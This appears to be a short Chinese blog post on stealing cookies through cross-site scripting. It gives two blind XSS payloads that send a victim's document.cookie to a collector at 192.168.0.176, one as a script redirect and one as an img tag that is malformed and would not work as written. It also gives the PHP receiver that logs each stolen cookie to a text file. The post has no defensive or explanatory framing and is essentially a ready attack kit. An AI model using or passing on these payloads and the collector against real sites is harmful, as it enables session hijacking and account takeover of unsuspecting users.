XSS打cookie

盲打cookie payload

<script>document.location='http://192.168.0.176/Hcookie.php?cookie='+document.cookie;</script>

<img src='http://192.168.0.176/Hcookie.php?cookie='+document.cookie>

服务器

<?php
$cookie = $_GET['cookie'];
$log = fopen("cookie.txt","a");
fwrite($log,$cookie."\n");
fclose($log);
?>
posted @ 2023-02-26 21:55  幻-心  阅读(30)  评论(0)    收藏  举报